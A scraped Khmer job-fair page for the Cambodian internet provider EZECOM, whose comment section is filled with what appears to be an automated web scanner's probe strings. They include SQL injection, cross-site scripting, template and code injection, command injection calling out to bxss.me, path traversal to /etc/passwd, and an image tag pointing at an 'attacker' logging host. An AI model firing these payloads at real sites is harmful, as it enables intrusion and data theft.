ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

អុីហ្សុីខម

ក្រុមហ៊ុន EZECOM ត្រូវបានបង្កើតឡើងដើម្បីបម្រើតម្រូវការទីផ្សារសេវាអុីនធឺណិតសម្រាប់ក្រុមហ៊ុន សហគ្រាស និងតាមលំនៅដ្ឋាន ដែលបាននឹងកំពុងរីកចំរើនយ៉ាងឆាប់រហ័សនៅប្រទេសកម្ពុជា។ ដោយបានបង្កើតឡើងនៅក្នុងឆ្នាំ២០០៧ក្រុមហ៊ុន EZECOM បានក្លាយជាអ្នកផ្តល់សេវាកម្មអុីនធឺណិត និងបច្ចេកវិទ្យាទំនាក់ទំនងដែលទូលំទូលាយនិងនាំមុខគេមួយ។ បេសកកម្មរបស់ក្រុមហ៊ុន EZECOM គឺដើម្បី “ក្លាយជាអ្នកផ្តល់ដំណោះស្រាយល្អជាងគេខាងសេវាទំនាក់ទំនងនៅប្រទេសកម្ពុជា តាមរយៈការបង្កើតថ្មី និងការបន្តកែលម្អខ្លួនព្រមទាំងជួយលើកស្ទួយដល់សង្គម”។ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 36

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 63 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 09:03:24


  @@LTckq


 • pHqghUme

  2021-05-06 09:03:22


  1<lOAKhQ<


 • pHqghUme

  2021-05-06 09:03:21


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 09:03:21


  1'"


 • pHqghUme

  2021-05-06 09:03:18


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 09:03:16


  f7QB4Ob0')) OR 803=(SELECT 803 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:03:14


  A3C5jMka') OR 748=(SELECT 748 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:03:14


  1<img sRc='http://attacker-9662/log.php?


 • pHqghUme

  2021-05-06 09:03:11


  LNtO8hIW' OR 89=(SELECT 89 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:03:09


  1<PEDtZ3 x=9581>


 • pHqghUme

  2021-05-06 09:03:07


  -1)) OR 388=(SELECT 388 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:03:02


  1<ifRAme sRc=9354.com></IfRamE>


 • pHqghUme

  2021-05-06 09:03:02


  -5) OR 361=(SELECT 361 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:02:59


  -5 OR 766=(SELECT 766 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:02:56


  vAUbOeNK'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:02:56


  1<WCQ5P1>PRIBQ[!+!]</WCQ5P1>


 • pHqghUme

  2021-05-06 09:02:53


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:02:50


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:02:47


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:02:44


  1p3lVE <ScRiPt >YwA1(9499)</ScRiPt>


 • pHqghUme

  2021-05-06 09:02:43


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 09:02:39


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 09:02:36


  1<% contenteditable onresize=YwA1(9738)>


 • pHqghUme

  2021-05-06 09:02:34


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 09:02:30


  1}body{acu:Expre/**/SSion(YwA1(9614))}


 • pHqghUme

  2021-05-06 09:02:30


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 09:02:27


  -1' OR 2+319-319-1=0+0+0+1 or 'jXciEhqk'='


 • pHqghUme

  2021-05-06 09:02:27


  -1" OR 2+176-176-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:02:26


  -1 OR 2+473-473-1=0+0+0+1


 • pHqghUme

  2021-05-06 09:02:26


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 09:02:26


  -1' OR 2+65-65-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:02:25


  RNttXnDj


 • pHqghUme

  2021-05-06 09:02:25


  -1 OR 2+646-646-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:02:21


  1


 • pHqghUme

  2021-05-06 09:02:18


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 09:02:17


  1


 • @@N6kqL

  2021-05-06 09:02:15


  1


 • 1'"

  2021-05-06 09:02:09


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 09:02:08


  1


 • pHqghUme

  2021-05-06 09:02:08


  1<input autofocus onfocus=YwA1(9824)>


 • pHqghUme

  2021-05-06 09:02:02


  1&lt;ScRiPt&gt;YwA1(9094)&lt;/sCripT&gt;


 • KqaZ3iAW')) OR 166=(SELECT 166 FROM PG_SLEEP(15))--

  2021-05-06 09:02:00


  1


 • pHqghUme

  2021-05-06 09:01:58


  1\u003CScRiPt\YwA1(9603)\u003C/sCripT\u003E


 • ZAoEA6yT') OR 754=(SELECT 754 FROM PG_SLEEP(15))--

  2021-05-06 09:01:57


  1


 • pHqghUme

  2021-05-06 09:01:54


  %31%3C%53%63%52%69%50%74%20%3E%59%77%41%31%289025%29%3C%2F%73%43%72%69%70%54%3E


 • rEnw9ZyD' OR 659=(SELECT 659 FROM PG_SLEEP(15))--

  2021-05-06 09:01:54


  1


 • IRzjZimd'; waitfor delay '0:0:15' --

  2021-05-06 09:01:50


  1


 • pHqghUme

  2021-05-06 09:01:48


  1<img/src=">" onerror=alert(9142)>


 • 1 waitfor delay '0:0:15' --

  2021-05-06 09:01:47


  1


 • pHqghUme

  2021-05-06 09:01:43


  1<img src=xyz OnErRor=YwA1(9054)>


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 09:01:43


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 09:01:38


  1


 • pHqghUme

  2021-05-06 09:01:38


  1<img src=//xss.bxss.me/t/dot.gif onload=YwA1(9920)>


 • pHqghUme

  2021-05-06 09:01:33


  1<body onload=YwA1(9554)>


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 09:01:33


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 09:01:27


  1


 • pHqghUme

  2021-05-06 09:01:27


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9082'>


 • pHqghUme

  2021-05-06 09:01:22


  1<isindex type=image src=1 onerror=YwA1(9657)>


 • -1" OR 2+363-363-1=0+0+0+1 --

  2021-05-06 09:01:21


  1


 • -1' OR 2+526-526-1=0+0+0+1 --

  2021-05-06 09:01:17


  1


 • -1' OR 2+587-587-1=0+0+0+1 or 'oRDb36VF'='

  2021-05-06 09:01:17


  1


 • -1 OR 2+210-210-1=0+0+0+1 --

  2021-05-06 09:01:16


  1


 • pHqghUme

  2021-05-06 09:01:16


  1<ScRiPt >YwA1(9856)</ScRiPt>


 • -1 OR 2+323-323-1=0+0+0+1

  2021-05-06 09:01:16


  1


 • RI8OQuH6

  2021-05-06 09:01:15


  1


 • pHqghUme

  2021-05-06 09:01:10


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9580></ScRiPt>


 • pHqghUme

  2021-05-06 09:01:08


  1


 • pHqghUme

  2021-05-06 09:01:02


  1<ScRiPt >YwA1(9180)</ScRiPt>


 • pHqghUme

  2021-05-06 09:01:01


  1


 • pHqghUme

  2021-05-06 09:00:55


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%59%77%41%31%28%39%34%32%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 09:00:54


  1


 • pHqghUme

  2021-05-06 09:00:52


  1<script>YwA1(9787)</script>


 • pHqghUme

  2021-05-06 09:00:50


  1


 • pHqghUme

  2021-05-06 09:00:50


  1


 • pHqghUme

  2021-05-06 09:00:48


  1<WSJSAY>H80EQ[!+!]</WSJSAY>


 • pHqghUme

  2021-05-06 09:00:43


  1


 • pHqghUme

  2021-05-06 09:00:41


  1<ScRiPt >YwA1(9231)</ScRiPt>


 • pHqghUme

  2021-05-06 09:00:37


  1


 • pHqghUme

  2021-05-06 09:00:35


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 09:00:31


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 09:00:29


  1


 • pHqghUme

  2021-05-06 09:00:27


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 09:00:23


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 09:00:22


  1


 • pHqghUme

  2021-05-06 09:00:20


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:00:18


  1


 • pHqghUme

  2021-05-06 09:00:16


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 09:00:11


  1


 • pHqghUme

  2021-05-06 09:00:10


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:00:06


  acux9470%C0%BEz1%C0%BCz2a%90bcxuca9470


 • pHqghUme

  2021-05-06 09:00:03


  1


 • pHqghUme

  2021-05-06 09:00:02


  acu10235%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10235


 • pHqghUme

  2021-05-06 08:59:55


  1


 • pHqghUme

  2021-05-06 08:59:54


  19886393


 • pHqghUme

  2021-05-06 08:59:48


  1


 • pHqghUme

  2021-05-06 08:59:47


  '"()&%<acx><ScRiPt >YwA1(9626)</ScRiPt>


 • pHqghUme

  2021-05-06 08:59:41


  1


 • pHqghUme

  2021-05-06 08:59:40


  1'"()&%<acx><ScRiPt >YwA1(9647)</ScRiPt>


 • pHqghUme

  2021-05-06 08:59:40


  1


 • pHqghUme

  2021-05-06 08:59:40


  1


 • pHqghUme

  2021-05-06 08:59:39


  1


 • pHqghUme

  2021-05-06 08:59:38


  1


 • pHqghUme

  2021-05-06 08:59:38


  1


 • pHqghUme<Bts6sk<

  2021-05-06 08:59:36


  1


 • pHqghUme<img sRc='http://attacker-9022/log.php?

  2021-05-06 08:59:31


  1


 • pHqghUme

  2021-05-06 08:59:29


  1


 • pHqghUme<fjczOi x=9585>

  2021-05-06 08:59:27


  1


 • pHqghUme<ifRAme sRc=9894.com></IfRamE>

  2021-05-06 08:59:24


  1


 • pHqghUme<WECOTR>9NNVC[!+!]</WECOTR>

  2021-05-06 08:59:20


  1


 • pHqghUme

  2021-05-06 08:59:19


  1


 • pHqghUmeHVjGI <ScRiPt >YwA1(9805)</ScRiPt>

  2021-05-06 08:59:15


  1


 • pHqghUme<% contenteditable onresize=YwA1(9123)>

  2021-05-06 08:59:10


  1


 • pHqghUme

  2021-05-06 08:59:10


  1


 • pHqghUme

  2021-05-06 08:59:07


  1


 • pHqghUme

  2021-05-06 08:59:06


  1


 • pHqghUme}body{acu:Expre/**/SSion(YwA1(9462))}

  2021-05-06 08:59:04


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 08:59:00


  1


 • pHqghUme

  2021-05-06 08:58:59


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 08:58:57


  1


 • pHqghUme

  2021-05-06 08:58:54


  1


 • pHqghUme<input autofocus onfocus=YwA1(9076)>

  2021-05-06 08:58:52


  1


 • pHqghUme

  2021-05-06 08:58:48


  1


 • pHqghUme&lt;ScRiPt&gt;YwA1(9298)&lt;/sCripT&gt;

  2021-05-06 08:58:44


  1


 • pHqghUme

  2021-05-06 08:58:41


  1


 • pHqghUme\u003CScRiPt\YwA1(9970)\u003C/sCripT\u003E

  2021-05-06 08:58:38


  1


 • pHqghUme

  2021-05-06 08:58:35


  1


 • pHqghUme

  2021-05-06 08:58:26


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%59%77%41%31%289448%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 08:58:26


  1


 • pHqghUme<img/src=">" onerror=alert(9027)>

  2021-05-06 08:58:18


  1


 • pHqghUme

  2021-05-06 08:58:15


  1


 • pHqghUme<img src=xyz OnErRor=YwA1(9734)>

  2021-05-06 08:58:14


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=YwA1(9072)>

  2021-05-06 08:58:08


  1


 • pHqghUme

  2021-05-06 08:58:06


  1


 • pHqghUme<body onload=YwA1(9951)>

  2021-05-06 08:58:04


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9967'>

  2021-05-06 08:58:00


  1


 • pHqghUme

  2021-05-06 08:57:57


  1


 • pHqghUme<isindex type=image src=1 onerror=YwA1(9305)>

  2021-05-06 08:57:54


  1


 • pHqghUme<ScRiPt >YwA1(9637)</ScRiPt>

  2021-05-06 08:57:49


  1


 • pHqghUme

  2021-05-06 08:57:45


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9415></ScRiPt>

  2021-05-06 08:57:45


  1


 • pHqghUme

  2021-05-06 08:57:45


  1


 • pHqghUme

  2021-05-06 08:57:44


  1


 • pHqghUme

  2021-05-06 08:57:44


  1


 • pHqghUme

  2021-05-06 08:57:43


  1


 • pHqghUme

  2021-05-06 08:57:43


  1


 • pHqghUme<ScRiPt >YwA1(9068)</ScRiPt>

  2021-05-06 08:57:40


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%59%77%41%31%28%39%30%30%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 08:57:36


  1


 • pHqghUme<script>YwA1(9342)</script>

  2021-05-06 08:57:33


  1


 • pHqghUme

  2021-05-06 08:57:30


  1


 • pHqghUme<WAEJMW>0PMEX[!+!]</WAEJMW>

  2021-05-06 08:57:28


  1


 • pHqghUme<ScRiPt >YwA1(9585)</ScRiPt>

  2021-05-06 08:57:24


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 08:57:21


  1


 • pHqghUme

  2021-05-06 08:57:17


  1


 • acx__${98991*97996}__::.x

  2021-05-06 08:57:16


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 08:57:12


  1


 • acx{{98991*97996}}xca

  2021-05-06 08:57:07


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 08:57:03


  1


 • <th:t="${acx}#foreach

  2021-05-06 08:56:57


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 08:56:48


  1


 • acux10432%C0%BEz1%C0%BCz2a%90bcxuca10432

  2021-05-06 08:56:41


  1


 • acu1137%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1137

  2021-05-06 08:56:33


  1


 • pHqghUme9468568

  2021-05-06 08:56:25


  1


 • '"()&%<acx><ScRiPt >YwA1(9764)</ScRiPt>

  2021-05-06 08:56:13


  1


 • pHqghUme'"()&%<acx><ScRiPt >YwA1(9062)</ScRiPt>

  2021-05-06 08:56:04


  1


 • pHqghUme

  2021-05-06 08:55:54


  1


 • pHqghUme

  2021-05-06 08:55:45


  1


 • pHqghUme

  2021-05-06 08:55:38


  1


 • pHqghUme

  2021-05-06 08:55:28


  1


 • pHqghUme

  2021-05-06 08:55:19


  1


 • pHqghUme

  2021-05-06 08:55:18


  |(nslookup hitcgsaniucpb70860.bxss.me||perl -e "gethostbyname('hitcgsaniucpb70860.bxss.me')")


 • pHqghUme

  2021-05-06 08:55:18


  `(nslookup hitrqduinvbfxe57c3.bxss.me||perl -e "gethostbyname('hitrqduinvbfxe57c3.bxss.me')")`


 • pHqghUme

  2021-05-06 08:55:15


  (nslookup hityfliuofugic04de.bxss.me||perl -e "gethostbyname('hityfliuofugic04de.bxss.me')")


 • pHqghUme

  2021-05-06 08:55:15


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 08:55:15


  $(nslookup hittqnnbdkvkie59c9.bxss.me||perl -e "gethostbyname('hittqnnbdkvkie59c9.bxss.me')")


 • pHqghUme

  2021-05-06 08:55:14


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 08:55:14


  |echo wwoery$()\ szwots\nz^xyu||a #' |echo wwoery$()\ szwots\nz^xyu||a #|" |echo wwoery$()\ szwots\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:55:14


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 08:55:13


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 08:55:13


  echo lssxlp$()\ cujifs\nz^xyu||a #' &echo lssxlp$()\ cujifs\nz^xyu||a #|" &echo lssxlp$()\ cujifs\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:55:13


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 08:55:13


  &echo gfkfpg$()\ gpezec\nz^xyu||a #' &echo gfkfpg$()\ gpezec\nz^xyu||a #|" &echo gfkfpg$()\ gpezec\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:55:12


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • ${@print(md5(31337))}\

  2021-05-06 08:55:11


  1


 • '.print(md5(31337)).'

  2021-05-06 08:55:11


  1


 • ";print(md5(31337));$a="

  2021-05-06 08:55:10


  1


 • ${@print(md5(31337))}

  2021-05-06 08:55:10


  1


 • pHqghUme

  2021-05-06 08:55:10


  1


 • pHqghUme

  2021-05-06 08:55:09


  1


 • ';print(md5(31337));$a='

  2021-05-06 08:55:09


  1


 • `(nslookup hitgscqzljflmb4d91.bxss.me||perl -e "gethostbyname('hitgscqzljflmb4d91.bxss.me')")`

  2021-05-06 08:55:09


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 08:55:08


  1


 • |(nslookup hitnujwcktjmme9346.bxss.me||perl -e "gethostbyname('hitnujwcktjmme9346.bxss.me')")

  2021-05-06 08:55:08


  1


 • pHqghUme

  2021-05-06 08:55:07


  1


 • pHqghUme

  2021-05-06 08:55:07


  <!--


 • <!--

  2021-05-06 08:55:06


  1


 • pHqghUme

  2021-05-06 08:55:06


  1


 • pHqghUme

  2021-05-06 08:55:06


  '"


 • '"

  2021-05-06 08:55:05


  1


 • pHqghUme

  2021-05-06 08:55:05


  1


 • pHqghUme

  2021-05-06 08:55:04


  1


 • $(nslookup hitcpzmutjjira8e15.bxss.me||perl -e "gethostbyname('hitcpzmutjjira8e15.bxss.me')")

  2021-05-06 08:55:04


  1


 • pHqghUme

  2021-05-06 08:55:04


  "+"A".concat(70-3).concat(22*4).concat(107).concat(80).concat(103).concat(79)+(require"socket" Socket.gethostbyname("hitxp"+"rxjjnchxec4d2.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 08:55:04


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 08:55:04


  1


 • pHqghUme

  2021-05-06 08:55:04


  1


 • pHqghUme

  2021-05-06 08:55:04


  '+'A'.concat(70-3).concat(22*4).concat(109).concat(83).concat(107).concat(83)+(require'socket' Socket.gethostbyname('hitij'+'skixodtkc0100.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 08:55:03


  1


 • (nslookup hitjtsywzsfcw4b327.bxss.me||perl -e "gethostbyname('hitjtsywzsfcw4b327.bxss.me')")

  2021-05-06 08:55:03


  1


 • pHqghUme

  2021-05-06 08:55:03


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 08:55:03


  1


 • '+'A'.concat(70-3).concat(22*4).concat(106).concat(86).concat(106).concat(89)+(require'socket' Socket.gethostbyname('hittv'+'yfeqsagfb2a35.bxss.me.')[3].to_s)+'

  2021-05-06 08:55:03


  1


 • pHqghUme

  2021-05-06 08:55:02


  1


 • pHqghUme

  2021-05-06 08:55:02


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 08:55:01


  1


 • |echo jxtkov$()\ oxynjz\nz^xyu||a #' |echo jxtkov$()\ oxynjz\nz^xyu||a #|" |echo jxtkov$()\ oxynjz\nz^xyu||a #

  2021-05-06 08:55:01


  1


 • "+"A".concat(70-3).concat(22*4).concat(105).concat(89).concat(104).concat(77)+(require"socket" Socket.gethostbyname("hitev"+"xlsauojg97c49.bxss.me.")[3].to_s)+"

  2021-05-06 08:55:01


  1


 • pHqghUme

  2021-05-06 08:55:00


  1


 • pHqghUme

  2021-05-06 08:55:00


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 08:55:00


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 08:54:59


  1


 • &echo hjfptl$()\ lzkdpa\nz^xyu||a #' &echo hjfptl$()\ lzkdpa\nz^xyu||a #|" &echo hjfptl$()\ lzkdpa\nz^xyu||a #

  2021-05-06 08:54:59


  1


 • pHqghUme

  2021-05-06 08:54:59


  1


 • echo zzlwmk$()\ gwafgo\nz^xyu||a #' &echo zzlwmk$()\ gwafgo\nz^xyu||a #|" &echo zzlwmk$()\ gwafgo\nz^xyu||a #

  2021-05-06 08:54:58


  1


 • pHqghUme

  2021-05-06 08:54:58


  1


 • pHqghUme

  2021-05-06 08:54:58


  1


 • pHqghUme

  2021-05-06 08:54:58


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 08:54:58


  1


 • /xfs.bxss.me

  2021-05-06 08:54:58


  1


 • pHqghUme

  2021-05-06 08:54:57


  1


 • pHqghUme

  2021-05-06 08:54:57


  1


 • pHqghUme

  2021-05-06 08:54:56


  1


 • pHqghUme

  2021-05-06 08:54:56


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 08:54:56


  1


 • pHqghUme

  2021-05-06 08:54:55


  1


 • pHqghUme

  2021-05-06 08:54:55


  1


 • pHqghUme

  2021-05-06 08:54:55


  1


 • pHqghUme

  2021-05-06 08:54:55


  1


 • pHqghUme

  2021-05-06 08:54:54


  1


 • pHqghUme

  2021-05-06 08:54:54


  1


 • pHqghUme

  2021-05-06 08:54:53


  '"()


 • pHqghUme

  2021-05-06 08:54:53


  1


 • pHqghUme

  2021-05-06 08:54:53


  1


 • pHqghUme

  2021-05-06 08:54:50


  bxss.me


 • pHqghUme

  2021-05-06 08:54:50


  1


 • pHqghUme

  2021-05-06 08:54:49


  '.gethostbyname(lc('hitnd'.'jtugdzoy27166.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(87).chr(108).chr(76).'


 • pHqghUme

  2021-05-06 08:54:49


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 08:54:49


  ".gethostbyname(lc("hitut"."zxxbwmeqc1d58.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(90).chr(105).chr(85)."


 • pHqghUme

  2021-05-06 08:54:48


  1some_inexistent_file_with_long_name%00.jpg


 • ".gethostbyname(lc("hitns"."skadsybx0301a.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(83).chr(105).chr(75)."

  2021-05-06 08:54:48


  1


 • pHqghUme

  2021-05-06 08:54:48


  Http://bxss.me/t/fit.txt


 • '.gethostbyname(lc('hityk'.'uvidjtgwdaf6b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(83).chr(107).chr(80).'

  2021-05-06 08:54:47


  1


 • pHqghUme

  2021-05-06 08:54:46


  1


 • pHqghUme

  2021-05-06 08:54:46


  1


 • '"()

  2021-05-06 08:54:46


  1


 • pHqghUme

  2021-05-06 08:54:46


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • pHqghUme

  2021-05-06 08:54:46


  1&n925789=v982436


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 08:54:45


  1


 • pHqghUme

  2021-05-06 08:54:45


  1


 • pHqghUme

  2021-05-06 08:54:45


  1


 • bxss.me

  2021-05-06 08:54:45


  1


 • pHqghUme

  2021-05-06 08:54:44


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • Http://bxss.me/t/fit.txt

  2021-05-06 08:54:44


  1


 • pHqghUme

  2021-05-06 08:54:44


  1


 • pHqghUme

  2021-05-06 08:54:44


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 08:54:43


  1


 • pHqghUme

  2021-05-06 08:54:43


  ^(#$!@#$)(()))******


 • pHqghUme&n973045=v979785

  2021-05-06 08:54:42


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 08:54:42


  1


 • pHqghUme

  2021-05-06 08:54:42


  1


 • pHqghUme

  2021-05-06 08:54:42


  !(()&&!|*|*|


 • pHqghUme

  2021-05-06 08:54:41


  1


 • pHqghUme

  2021-05-06 08:54:41


  )


 • pHqghUme

  2021-05-06 08:54:41


  1


 • pHqghUme

  2021-05-06 08:54:40


  1


 • pHqghUme

  2021-05-06 08:54:40


  1


 • ^(#$!@#$)(()))******

  2021-05-06 08:54:40


  1


 • pHqghUme

  2021-05-06 08:54:40


  1


 • pHqghUme

  2021-05-06 08:54:39


  1


 • pHqghUme

  2021-05-06 08:54:39


  1


 • !(()&&!|*|*|

  2021-05-06 08:54:39


  1


 • pHqghUme

  2021-05-06 08:54:38


  1


 • pHqghUme

  2021-05-06 08:54:38


  1


 • )

  2021-05-06 08:54:38


  1


 • pHqghUme

  2021-05-06 08:54:37


  1


 • pHqghUme

  2021-05-06 08:54:37


  1


 • pHqghUme

  2021-05-06 08:54:36


  1


 • pHqghUme

  2021-05-06 08:54:36


  1


 • pHqghUme

  2021-05-06 08:54:36


  1


 • pHqghUme

  2021-05-06 08:54:35


  1


 • pHqghUme

  2021-05-06 08:54:35


  1


 • pHqghUme

  2021-05-06 08:54:35


  1


 • pHqghUme

  2021-05-06 08:54:34


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 08:54:34


  1


 • pHqghUme

  2021-05-06 08:54:34


  1


 • pHqghUme

  2021-05-06 08:54:33


  1


 • pHqghUme

  2021-05-06 08:54:33


  1


 • pHqghUme

  2021-05-06 08:54:33


  1


 • pHqghUme

  2021-05-06 08:54:32


  1


 • pHqghUme

  2021-05-06 08:54:32


  1


 • pHqghUme

  2021-05-06 08:54:32


  1


 • pHqghUme

  2021-05-06 08:54:31


  1


 • pHqghUme

  2021-05-06 08:54:28


  1


 • pHqghUme

  2021-05-06 08:54:27


  ../1


 • pHqghUme

  2021-05-06 08:54:26


  1


 • ZUpESTdvcEc=

  2021-05-06 08:54:26


  1


 • pHqghUme

  2021-05-06 08:54:25


  1


 • pHqghUme

  2021-05-06 08:54:25


  1


 • pHqghUme

  2021-05-06 08:54:25


  1


 • pHqghUme

  2021-05-06 08:54:24


  1


 • pHqghUme

  2021-05-06 08:54:24


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 08:54:24


  ${9999195+9999648}


 • ${10000436+9999974}

  2021-05-06 08:54:23


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 08:54:22


  1


 • pHqghUme

  2021-05-06 08:54:22


  1


 • pHqghUme

  2021-05-06 08:54:22


  1


 • pHqghUme

  2021-05-06 08:54:22


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 08:54:22


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 08:54:21


  1


 • pHqghUme

  2021-05-06 08:54:21


  1


 • pHqghUme

  2021-05-06 08:54:21


  1


 • ../pHqghUme

  2021-05-06 08:54:21


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 08:54:20


  1


 • pHqghUme

  2021-05-06 08:54:20


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 08:54:19


  1


 • pHqghUme

  2021-05-06 08:54:18


  1


 • pHqghUme

  2021-05-06 08:54:18


  "+response.write(9334108*9560905)+"


 • pHqghUme

  2021-05-06 08:54:17


  '+response.write(9334108*9560905)+'


 • pHqghUme

  2021-05-06 08:54:17


  1


 • pHqghUme

  2021-05-06 08:54:16


  response.write(9334108*9560905)


 • pHqghUme

  2021-05-06 08:54:16


  1


 • "+response.write(9510165*9303197)+"

  2021-05-06 08:54:15


  1


 • pHqghUme

  2021-05-06 08:54:15


  1


 • response.write(9510165*9303197)

  2021-05-06 08:54:14


  1


 • pHqghUme

  2021-05-06 08:54:14


  1


 • pHqghUme

  2021-05-06 08:54:14


  1


 • '+response.write(9510165*9303197)+'

  2021-05-06 08:54:14


  1


 • pHqghUme

  2021-05-06 08:54:14


  1


 • pHqghUme

  2021-05-06 08:54:14


  1


